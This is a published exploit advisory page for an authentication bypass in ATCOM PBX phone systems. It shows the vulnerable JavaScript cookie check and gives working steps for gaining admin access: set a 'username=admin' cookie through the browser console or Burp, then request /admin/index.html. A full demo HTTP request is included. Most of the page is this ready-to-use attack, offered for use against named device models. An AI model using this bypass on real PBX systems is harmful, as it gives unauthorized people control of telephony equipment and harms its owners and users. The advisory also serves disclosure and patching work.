ATCOM PBX system auth bypass exploit

2016.06.16
Credit: i-Hmx
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title: ATCOM PBX system , auth bypass exploit # Author: i-Hmx # contact : n0p1337@gmail.com # Home : sec4ever.com # Tested on : ATCOM IP01 , IP08 , IP4G and ip2G4A Details The mentioned system is affected by auth bypass flaw that allow an attacker to get admin access on the vulnerable machine without perior access The security check is really stupid , depend on js affected lines js/util.js function alertWithoutLogin(){ var username = getCookie("username"); //alert(username); if(!!!username){ alert('Sorry, permission denied. Please login first!'); } } so actually it just check if username value exist in cookies and if not , redirect to login.html just like that!!!!!!!!!!!!! exploitation?! just from browser , press f12 , open console type document.cookie="username=admin" or from burp intercept proxy and set the cookies as well go to ip/admin/index.html and you are in , simple like that :/ Demo request GET /admin/index.html HTTP/1.1 Host: 192.168.44.12 User-Agent: Mozilla/1.0 (Windows NT 3.3; WOW32; rv:60.0) Gecko/20010101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: username=admin Connection: close Upgrade-Insecure-Requests: 1 From Eg-R1z with love ./Faris


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top